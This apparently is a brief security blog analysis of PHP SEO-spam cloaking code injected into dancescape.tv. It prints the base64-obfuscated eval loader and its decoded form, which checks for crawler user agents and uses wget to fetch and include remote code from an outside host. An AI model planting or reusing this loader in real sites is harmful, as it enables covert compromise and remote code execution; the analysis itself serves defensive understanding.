The website reviewed, dancescape.tv, appears perfectly normal when viewed from standard browsers, but some PHP code has been injected that gives a long series of links designed to bump the PageRank of certain sites when viewed by a crawler.
The PHP code in question looks like this:
eval(base64_decode("aWYgKChlcmVnaSgiYm90IiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSBvciBlcmVnaSgidXJwIiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSBvciBlcmVnaSgibXNuIiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSkpIHsgc3lzdGVtKCJ3Z2V0IC1PIC90bXAvZ2V0aW5jbC50eHQgaHR0cDovL3B1YmxpY3NudWRlLmNvbS90ZW1wL2luY2wudHh0Iik7aW5jbHVkZSgiL3RtcC9nZXRpbmNsLnR4dCIpOyB9"));
And resolves to this:
if ((eregi("bot", $_SERVER["HTTP_USER_AGENT"]) or eregi("urp", $_SERVER["HTTP_USER_AGENT"]) or eregi("msn", $_SERVER["HTTP_USER_AGENT"]))) {
system("wget -O /tmp/getincl.txt http://[redacted].com/temp/incl.txt");
include("/tmp/getincl.txt");
}
When viewing the page with a user agent of googlebot, you get a lot of links that weren't there before. Here's a screenshot of one of the less offensive examples:
In other instances, a ton of porn links and text are displayed instead of the pharmaceutical links shown here.
This just proves the trends from open compromise to secret compromise. Most malware already tries to hide itself; web site defacements seem also to be a thing of the past as compromised sites are used more and more for relaying attacks and for more stealthy, income earning purposes.